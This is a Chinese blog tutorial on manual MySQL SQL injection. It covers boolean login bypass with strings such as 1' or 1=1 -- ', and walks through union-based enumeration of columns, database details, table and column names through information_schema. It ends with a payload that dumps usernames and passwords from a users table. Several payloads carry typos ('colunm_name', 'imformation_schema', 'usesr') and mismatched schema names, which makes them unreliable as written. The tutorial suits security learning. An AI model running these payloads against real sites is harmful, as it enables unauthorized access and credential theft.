美文网首页
2019-11-13

2019-11-13

作者: BenjaminD | 来源:发表于2019-11-13 02:36 被阅读0次

mysql手工注入


一、SQL注入的理解

    将特殊SQL语句添加到查询url后面,以获取非法的数据的操作。

    1.布尔注入    //返回真或假

    2.联合注入    //一起查询

    3.延时注入    //定时器查询

    4.报错注入    //报错,但信息是我们想要的

二、布尔注入

    布尔注入可以用在密码绕过这块。原理:利用引号提前闭合SQL语句 和 or的一真即真 的特点相结合进行密码绕过。

正常输入用户名和密码时执行的SQL如下:select username,password from admin where username = 'root' and password = ‘123456’;

利用密码绕过登录时执行的SQL如下:

select username,password from admin where username = '1' or 1=1 -- ' and password = '123';

密码绕过常用的代码:   

1' or 1=1 -- '

1' or 2>1 -- '

1' or true -- '                             

注:这里 -- 是注释作用

三、联合注入

    联合查询需要经过一下步骤:

1.判断注入点

利用 and 1=1 和and 1=2来判断是否是注入点。

2.爆出当前查询列数

利用 order by 或者 group by 结合折中法爆出当前查询总的字段数。猜到4时报错,猜到3时正常,说明列数为3。

3.爆可显位置

爆出的长度为3,参数值想办法让其报错(可以加负号等),然后进行联合查询?id=-1 union select 1,2,3 爆出可显位置。爆出位置2和3。

4.利用可显位置爆出数据库名。此时也可以爆出数据库版本、当前用户、数据库路径、数据库名称等相关信息

    version--mysql版本

    user--数据库用户

    database--数据库名

    @datadir--数据库路径

    @@versioncompileos--操作系统

5.爆表名

    (1)用点连接库下存放表名的tables表

    (2)然后用where来精确查询存放在table_schema中的库名

    (3)用limit函数来进行遍历

    (4)用-- 注释防止报错

最终payload为:

union select 1,2,table_name from information_schema.tables where table_schema='sqlzhuru' limit 1,1 --+

拿到记录账号密码的users表

6.爆字段

    爆出表名后,接下来爆想要的列名,思路如上,遍历出想要的字段,username和password。

最终payload为:

union select 1,2,colunm_name from imformation_schema.colunms where table_schema='sqlzhuru' and  table_name='usesr' limit 1,1 --+

修改limit函数,遍历第二个想要的列名 union select 1,2,column_name from information_schema.columns where table_schema=’security’and table_name=’users’ limit 2,1 --+

7.整合信息爆出用户名和密码

union select 1,username,password from users limit 1,1 --+

相关文章

  • 11月13日

    2019-11-13 毛雅亭 字数 638 · 阅读 1 2019-11-11 08:16 ...

  • 2019-11-13

    2019-11-13 【日精进打卡第 599 天 【知~学习】 《六项精进》大纲 4 遍共 2252 遍 《大学》...

  • 文先森的日常--剩33天

    日精进打卡第455天 姓名:李文杰 (四爷); 公司:中国太平人寿; 日期:2019-11-13 【知~学习】 《...

  • 峰言峰语__林海峰每日随感

    峰言峰语--林海峰(森林大海山峰)每日随感 2019-11-13 19:28 2018.11.10 完整的和自己相...

  • MySQL 细致讲解索引

    MySQL 如何正确的使用索引 真致信息技术 2019-11-13 17:46:04 学习索引,主要是写出更快的s...

  • 关于人才培养的内部管理会议的摘要

    时间:2019-11-13 参会:崔文生、云飞、区域经理、园长、部门经理 议题:怎么培养人?怎样识别人?什么样的人...

  • 2019-11-14

    2019-11-13 日精进打卡 姓名:彭新 宁波蓝天白云供应链管理有限公司 【日精进打卡第594天】 【知~学习...

  • 沟通的艺术(2) - 1.2 沟通的历程

    2019-11-13 第一章 人际沟通入门 1.2 沟通的历程 沟通的历程,可以理解或者翻译为,“沟通的过程”更好...

  • 2019-11-13

    2019-11-13 姓名:符振华(379期 反省三组) 公司:深圳蔚蓝时代商业管理有限公司-上海第一分公司 【日...

  • 2019-11-13

    2019-11-13 日精进打卡 姓名:彭新 宁波蓝天白云供应链管理有限公司 【日精进打卡第570天】 【知~学习...

网友评论

      本文标题:2019-11-13

      本文链接:https://www.haomeiwen.com/subject/swvcictx.html